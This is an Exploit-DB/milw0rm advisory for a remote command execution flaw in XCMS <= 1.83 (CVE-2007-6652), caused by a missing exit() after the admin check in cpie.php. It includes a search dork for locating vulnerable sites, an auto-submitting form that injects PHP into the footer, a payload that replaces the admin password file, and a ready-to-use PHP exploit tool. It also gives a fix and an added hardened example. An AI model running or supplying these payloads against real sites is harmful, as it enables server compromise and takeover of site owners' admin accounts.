XCMS <= 1.83 - Remote Command Execution Exploit

2007-12-30T00:00:00
ID EDB-ID:4813
Type exploitdb
Reporter x0kster
Modified 2007-12-30T00:00:00

Description

XCMS <= 1.83 Remote Command Execution Exploit. CVE-2007-6652. Web application exploit for the PHP platform.

Name            :  XCMS <= v1.83 Remote Command Execution Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.xcms.it
Date            :  28/12/2007
Dork            :  inurl:"mod=notizie"

The XCMS footer (stored in "/dati/generali/footer.dtb") is included in every page of XCMS.
Take "home.php" as an example:
 
       <?php
         //home.php
         [...]
         include(CSTR."footer".STR); // <- "CSTR" and "STR" are constants declared earlier; they refer to "/dati/generali" and "dtb"
       ?>

XCMS lets you modify the footer through a buggy page called cpie.php, which is part of the admin panel.
Let's take a look at the buggy code.

       <?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- an exit() is missing, so the script keeps running :-D
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of check
         }
         [...]
       ?>
       
So with a simple HTML form we can change the footer.
Example:

        <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
        <input type="hidden" name="salva" value="OK" />
        <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
        <input type="submit" value="Modifica" />
        </form>
        <script>document.editor.submit()</script>

        Note: this is NOT a CSRF; it is just an example of changing the footer without the admin credentials.
 
 
       
Trick: We can change the admin panel password by inserting this code in the footer:
      
       <?php
       $pwd = "owned"; // <- Place your new password here.
       $pwd2 = md5($pwd);
       unlink("dati/generali/pass.php");
       $f = fopen("dati/generali/pass.php","w"); // mode must be the quoted string "w" (the original used a bare w, which is an undefined constant)
       fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
       fclose($f);
       ?>
       
This code deletes the old password file and then creates a new one containing your new password.


Fix:

        <?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() after the redirect, the bug is fixed
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of check
         }
         [...]
       ?>
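The fix above works because header() only sends a redirect; it does not stop the script, so every line after it still executes for an unauthenticated request. As an added example (not code from the advisory or from the XCMS project), here is the same gate written as a reusable function, with the save routine guarded a second time so the invariant survives later edits. FOOTER_FILE, require_admin() and save_footer() are names chosen for this example; they are not XCMS identifiers.

```php
<?php
// Added example: a deny-by-default admin gate for a page like cpie.php.
//
// The advisory's bug: header("location:index.php") asks the browser to go
// elsewhere, but PHP keeps executing the rest of the script, so the footer
// save below the check still runs for anyone who POSTs salva/testo_0.
// Terminating the script right after the redirect is what closes the hole.

// Hypothetical storage path, standing in for CGEN."footer".DTB in the advisory.
define('FOOTER_FILE', __DIR__ . '/dati/generali/footer.dtb');

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['logadmin'])) {
        header('Location: index.php', true, 303);
        exit(); // <- without this line everything below still runs
    }
}

function save_footer(string $path, string $text): bool
{
    // Second guard: save_footer() is only reachable after require_admin(),
    // but checking here too keeps the page safe if someone reorders the code.
    if (empty($_SESSION['logadmin'])) {
        return false;
    }
    return file_put_contents($path, $text, LOCK_EX) !== false;
}

require_admin(); // unauthenticated requests never get past this line

if (isset($_POST['salva'], $_POST['testo_0'])) {
    $ok = save_footer(FOOTER_FILE, (string) $_POST['testo_0']);
    echo $ok ? 'Footer saved.' : 'Save failed.';
}
```

Because home.php pulls the footer in with include(), whatever is saved to footer.dtb is executed as PHP on every page view, so this authorization check is the only barrier between an HTTP request and code execution on the server. A design that rendered the footer as data (echo with output escaping) instead of include() would remove that second consequence even if the gate were bypassed again.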

So here is a simple exploit:


<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
// $_SERVER['PHP_SELF'] is the script's own path; the original read it from $_POST, which is always empty on the first visit
echo "
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork  :  inurl:\"mod=notizie\"
by x0kster
Visit ihteam.net
</pre>
<form method=POST action=\"".$_SERVER['PHP_SELF']."\">
<pre>
Site     :
<input type=text name=site />
Code     :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>

# milw0rm.com [2007-12-30]